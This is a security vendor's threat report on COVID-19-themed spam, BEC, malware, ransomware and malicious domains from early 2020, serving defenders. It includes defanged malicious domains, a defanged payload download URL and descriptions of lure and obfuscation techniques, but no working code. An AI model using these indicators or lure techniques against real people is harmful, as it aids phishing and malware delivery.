Skip to main content

Developing Story: Coronavirus Used in Malicious Campaigns

Updated on March 16, 2020.Originally published on March 06, 2020.Former Title: Coronavirus Used in Spam, Malware File Names, and Malicious Domains

The coronavirus disease (COVID-19) is being used in a variety of malicious campaigns including email spamBEC, malware, ransomware, and malicious domains.  As the number of those afflicted continue to surge by thousands, campaigns that use the disease as a lure likewise increase. Trend Micro researchers are periodically sourcing for samples on coronavirus-related malicious campaigns. This report also includes detections from other researchers.

The mention of current events for malicious attacks is nothing new for threat actors, who time and again use the timeliness of hot topics, occasions, and popular personalities in their social engineering strategies.

[Related: Emotet Uses Coronavirus Scare in Latest Campaign, Targets Japan]
 

Spam

Trend Micro researchers acquired email samples sent to and received from all over the globe, including countries such as the U.S., Japan, Russia, and China. Many of the emails, purportedly from official organizations, contain updates and recommendations connected to the disease. Like most email spam attacks, they also include malicious attachments.

One of the samples used the email subject “Corona Virus Latest Updates” and claimed to come from the Ministry of Health. It contained recommendations on how to prevent infection and came with an attachment that supposedly contains the latest updates on COVID-19 but actually carried malware.

cv

Figure 1. COVID-19 related email spam purportedly from the Ministry of Health
 

Many of the spam emails were related to shipping transactions, either postponement due to the spread of the disease or one that provides a shipping update. One email informed about shipping postponement. The attachment, supposedly containing the details of the new shipping schedule, bears malware. The email is assumed to come from Japan, and included details written in Japanese (masked in the screenshot).

cv

Figure 2. COVID-19 related email spam about a shipping postponement
 

There were also other samples detected in foreign languages such as Italian and Portuguese. The email in Italian was about important information about the virus, while the email in Portuguese discussed a supposed vaccine for COVID-19.

cv

Figure 3: COVID-19 related email spam in Italian

cv

Figure 4. COVID-19 related email spam in Portuguese

 

Malware Files

Trend Micro researchers were also able to detect malware with “corona virus” in their filename, listed below:

cv1

Other researchers are seeing cybercriminals take advantage of coronovirus maps and dashboards. Researchers from Reason Labs have found fake websites that lead the download and installation of malware. The downloaded malware are detected by Trend Micro as the following:

cv2

Domains

A notable increase in domain names using the word “corona” has also been observed by Bit Discovery. Trend Micro researchers confirmed the following domains as malicious:

  • acccorona[.]com
  • alphacoronavirusvaccine[.]com
  • anticoronaproducts[.]com
  • beatingcorona[.]com
  • beatingcoronavirus[.]com
  • bestcorona[.]com
  • betacoronavirusvaccine[.]com
  • buycoronavirusfacemasks[.]com
  • byebyecoronavirus[.]com
  • cdc-coronavirus[.]com
  • combatcorona[.]com
  • contra-coronavirus[.]com
  • corona-armored[.]com
  • corona-crisis[.]com
  • corona-emergency[.]com
  • corona-explained[.]com
  • corona-iran[.]com
  • corona-ratgeber[.]com
  • coronadatabase[.]com
  • coronadeathpool[.]com
  • coronadetect[.]com
  • coronadetection[.]com

 

Updates as of March 16, 2020

Email Spam

Trend Micro researchers encountered an email spam sample targetting China and Italy that mentioned a cure for coronavirus in the email subject as a lure for downloading the malicious attachment. Further inspection revealed that  the payload sample from the attachment is HawkEye Reborn, a newer variant of the information-stealing HawkEye trojan. The file is a heavily obfuscated AutoIT script compiled into an executable. This script will then inject malicious code to RegSvcs.exe. Dumping the injected code will yield a .NET executable that is also packed using ConfuserEx. Part of the decrypted configuration of the HawkEye sample includes the email address and mail server where it will send its exfiltrated data.

cv

Figure 5. HawkEye Reborn coronavirus email spam

Indicators of Compromise

cv3

Other samples of email spam targeting Italy were also detected by Trend Micro researchers. This time, mentions of the disease were not found in the email subjects, but in the URL. The subject instead contained the word “Fattura” (Italian for “invoice”), the invoice number, and its supposed date. The emails had attachments that contain malware, which executes a PowerShell command that will download a file from a URL related to COVID-19. The URL is hxxps://recoverrryasitalycovid-19.xyz/over

Upon further investigation, it was found that the malware used Evil Clippy, a tool for creating malicious MS Office Documents, to hide its macro.

cv

Figure 6. Italian email spamconnected to a URL related to COVID-19

Trend Micro detections for these are the following:

cv

BEC

A Business Email Compromise (BEC) attack mentioning coronavirus was reported by Agari Cyber Intelligence Division (ACID). The attack, a continuation of an earlier BEC campaign, came from Ancient Tortoise, a cybercrime group behind multiple BEC cases in the past.

The threat actors first target accounts receivables into forwarding aging reports (accounts receivable reports). Then, while posing as legitimate companies, they use customer information in these reports to send emails to inform customers of a change in banks and payment methods due to COVID-19.

Malware

An interactive coronavirus map was used to spread information-stealing malware, as revealed by Brian Krebs. The map, which was created by Johns Hopkins University, is an interactive dashboard showing coronavirus infections and deaths. Several members of Russian underground forums took advantage of this and sold a digital Coronavirus infection kit that deploys Java-based malware. Victims are lured to open the map and even share it.

Ransomware

A new ransomware variant called CoronaVirus was spread through a fake Wise Cleaner site, a website that supposedly promoted system optimization, as reported by MalwareHunterTeam. Victims unknowingly download the file WSGSetup.exe from the fake site. The said file acts as a downloader for two types of malware: The CoronaVirus ransomware and password-stealing trojan named Kpot. This campaign follows the trend of recent ransomware attacks that go beyond encrypting data and steal information as well.

Another attack that is presumed to be caused by ransomware has hit a University Hospital Brno in the Czech Republic, a COVID-19 testing center. The hospital’s computer systems had been shut down due to the attack, delaying the release of COVID-19 test results.

A mobile ransomware named CovidLock comes from a malicious Android app that supposedly helps track cases of COVID-19. The ransomware locks the phones of victims, who are given 48 hours to pay US$100 in bitcoin to regain access to their phone. Threats include the deletion of data stored in the phone and the leak of social media account details.

Defense against these threats

Trend Micro endpoint solutions such as the Smart Protection Suites and Worry-Free™️ Business Security detect and block the malware and the malicious domains it connects to.

As an added layer of defense, Trend Micro™ Email Security thwarts spam and other email attacks. The protection it provides is constantly updated, ensuring that the system is safeguarded from both old and new attacks involving spam, BEC, and ransomware. Trend Micro™ InterScan™ Messaging Security provides comprehensive protection that stops inbound threats and secures outbound data. It blocks spam and other email threats.

A multilayered protection is also recommended for protecting all fronts and preventing users from accessing malicious domains that could deliver malware.

Source: TrendMicro

Share this post